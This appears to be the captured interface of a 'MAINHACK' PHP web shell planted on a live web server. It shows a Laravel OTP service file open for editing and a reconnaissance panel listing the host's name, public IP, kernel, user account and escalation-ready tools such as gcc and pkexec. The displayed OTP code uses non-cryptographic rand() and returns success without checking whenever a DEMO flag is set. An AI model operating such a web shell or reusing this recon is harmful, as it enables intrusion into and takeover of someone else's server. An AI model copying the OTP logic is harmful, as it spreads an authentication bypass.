[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: OtpManagerService.php
<?php namespace App\Services; use App\Events\SendSmsCode; use Exception; use App\Models\Otp; use App\Enums\OtpType; use Illuminate\Http\Request; use Illuminate\Support\Facades\Log; use Smartisan\Settings\Facades\Settings; use App\Http\Requests\VerifyPhoneRequest; use Illuminate\Support\Facades\DB; use Carbon\Carbon; class OtpManagerService { /** * @throws Exception */ public function otp(Request $request) : bool { try { $otp = DB::table('otps')->where([ ['phone', $request->post('phone')], ['code', $request->post('code')], ]); if ($otp->exists()) { $otp->delete(); } if (OtpType::SMS == Settings::group('otp')->get('otp_type') || OtpType::BOTH == Settings::group('otp')->get( 'otp_type' )) { $token = rand( pow(10, (int)Settings::group('otp')->get('otp_digit_limit') - 1), pow(10, (int)Settings::group('otp')->get('otp_digit_limit')) - 1 ); } else { $token = rand(pow(10, 4 - 1), pow(10, 4) - 1); } $otp = Otp::create([ 'phone' => $request->phone, 'code' => $request->code, 'token' => $token, 'created_at' => now(), ]); if (!blank($otp)) { SendSmsCode::dispatch( ['phone' => $request->post('phone'), 'code' => $request->post('code'), 'token' => $token] ); } return true; } catch (Exception $exception) { Log::info($exception->getMessage()); throw new Exception($exception->getMessage(), 422); } } /** * @throws Exception */ public function verify(VerifyPhoneRequest $request) : bool { try { if(env('DEMO')) { return true; } $otp = DB::table('otps')->where([ ['phone', $request->post('phone')], ['token', $request->post('token')], ]); if ($otp->exists()) { $difference = Carbon::now()->diffInSeconds($otp->first()->created_at); if ($difference > (int)Settings::group('otp')->get('otp_expire_time') * 60) { throw new Exception(trans('all.message.code_is_expired'), 422); } else { $otp->delete(); return true; } } else { throw new Exception(trans('all.message.code_is_invalid'), 422); } } catch (Exception $exception) { Log::info($exception->getMessage()); throw new Exception($exception->getMessage(), 422); } } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 60.06 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002